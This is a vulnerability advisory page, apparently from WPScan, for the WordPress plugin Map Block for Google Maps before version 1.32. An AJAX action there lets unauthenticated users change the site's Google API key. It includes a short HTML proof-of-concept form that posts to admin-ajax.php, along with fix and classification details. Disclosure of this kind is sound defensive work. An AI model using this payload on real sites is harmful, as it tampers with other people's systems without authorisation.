logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Map Block for Google Maps < 1.32 - Unauthorised Google API Key change

Description

The gmw_map_block_save_key AJAX action, available to both authenticated and unauthenticated users did not have any check in place to prevent unauthorised change of the Google API key.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="gmw_map_block_save_key" />
      <input type="hidden" name="api_key" value="XXXX" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

map-block-gutenberg

Fixed in version 1.32

References

URL

https://plugins.trac.wordpress.org/changeset/2470760

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CWE-284

Miscellaneous

Verified

Yes

WPVDB ID

f1e6815a-a130-4490-9b56-6184cb110e44

Timeline

Publicly Published

2021-02-10 (about 2 months ago)

Added

2021-02-10 (about 2 months ago)

Last Updated

2021-02-10 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin